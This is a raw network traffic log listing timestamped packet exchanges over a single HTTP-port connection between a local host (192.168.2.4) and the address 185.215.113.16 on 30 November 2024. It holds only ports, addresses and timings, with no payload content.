Nov 30, 2024 04:06:28.660706043 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.660782099 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.660845041 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.661798954 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.661851883 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.661890030 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.661937952 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.662904024 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.662946939 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.663012981 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.663053036 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.664032936 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.664082050 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.664235115 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.664277077 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.665185928 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.665230989 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.665288925 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.665330887 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.666286945 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.666336060 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.666395903 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.666444063 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.667447090 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.667505980 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.667573929 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.667623043 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.668541908 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.668600082 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.668642044 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.668689013 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.669676065 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.669734001 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.669738054 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.669785023 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.670798063 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.670850992 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.670901060 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.670953989 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.671920061 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.671968937 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.672024965 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.672064066 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.673053026 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.673103094 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.673113108 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.673154116 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.674189091 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.674233913 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.674274921 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.674319029 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.675342083 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.675390959 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.675430059 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.675489902 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.676453114 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.676506996 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.676567078 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.676609039 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.677570105 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.677620888 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.677683115 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.677725077 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.678674936 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.678725004 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.678801060 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.678842068 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.679822922 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.679869890 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.679932117 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.679974079 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.680959940 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.681010008 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.681068897 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.681107998 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.682063103 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.682102919 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.682230949 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.682269096 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.683207989 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.683253050 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.683285952 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.683341026 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.826430082 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.826570988 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.826613903 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.826633930 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.826881886 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.826925993 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.826991081 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.827029943 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.828003883 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.828043938 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.828109980 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.828145981 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.829135895 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.829175949 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.829251051 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.829291105 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.830260992 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.830307961 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.830379009 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.830415964 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.831398010 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.831437111 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.831501961 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.831543922 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.832518101 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.832557917 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.832626104 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.832664967 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.833693981 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.833740950 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.833798885 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.833837032 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.834820986 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.834860086 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.834932089 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.834969997 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.835908890 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.835951090 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.836009026 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.836047888 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.837044954 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.837090015 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.837131977 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.837171078 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.838151932 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.838191986 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.838262081 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.838303089 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.839262009 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.839302063 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.839395046 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.839435101 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.840423107 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.840467930 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.840533018 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.840574980 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.841540098 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.841582060 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.841644049 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.841682911 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.842664957 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.842704058 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.842787027 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.842828989 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.843806028 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.843849897 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.843904972 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.843947887 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.844916105 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.844959974 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.845030069 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.845069885 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.846049070 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.846091032 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.846158981 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.846194983 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.847201109 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.847244978 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.847278118 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.847331047 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.848329067 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.848366022 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.848443985 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.848483086 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.849447012 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.849489927 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.849554062 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.849613905 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.850580931 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.850625038 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.850670099 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.850708961 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.851682901 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.851727009 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.851788044 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.851833105 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.852833033 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.852878094 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.853003025 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.853044033 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.853955984 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.854005098 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.854043961 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.854084015 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.855082989 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.855122089 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.855187893 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.855228901 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.856194973 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.856245995 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.856309891 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.856350899 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.857335091 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.857381105 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.857420921 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.857460976 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.858465910 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.858508110 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.858568907 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.858612061 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.859613895 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.859669924 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.859709024 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.859750032 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.860712051 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.860763073 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.860821962 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.860863924 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.861846924 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.861897945 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.861934900 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.861975908 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.862963915 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.863010883 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.863073111 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.863112926 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.864099979 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.864140034 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.864188910 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.864229918 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.865250111 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.865291119 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.865406036 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.865447998 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.866389036 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.866436005 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.866472006 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.866514921 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.867484093 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.867526054 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.867530107 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.867568016 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.868630886 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.868673086 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.868738890 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.868781090 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.869740009 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.869788885 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.869827986 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.869872093 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.870865107 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.870908976 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.870961905 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.871011019 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.871993065 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.872034073 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.872096062 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.872140884 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.873117924 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.873158932 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.873281956 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.873331070 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.874243975 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.874284029 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.874341965 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.874382973 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.875375032 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.875415087 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.875478029 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.875518084 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.876499891 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.876539946 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.876588106 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.876629114 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.877655029 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.877711058 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.877736092 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.877775908 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.878745079 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.878787041 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.878848076 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.878887892 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.879872084 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.879911900 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.879983902 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.880026102 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.880999088 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.881052017 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.881118059 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.881158113 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.882133961 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.882179022 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.882250071 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.882289886 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.883276939 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.883330107 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.883377075 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.883418083 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.884396076 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.884437084 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.884496927 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.884535074 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.885490894 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.885536909 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.027659893 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.027710915 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.027744055 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.027777910 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.028158903 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.028192997 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.028220892 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.028255939 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.029275894 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.029311895 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.029391050 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.029427052 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.030425072 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.030463934 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.030534983 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.030574083 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.031532049 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.031573057 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.031627893 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.031661034 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.032649040 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.032691002 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.032763004 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.032804012 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.033796072 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.033830881 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.033901930 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.033941031 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.034903049 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.034940958 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.035015106 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.035053015 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.036047935 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.036082983 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.036149025 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.036180973 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.037164927 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.037213087 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.037275076 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.037309885 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.038316011 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.038358927 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.038400888 CET	80	49800	185.215.113.16	192.168.2.4
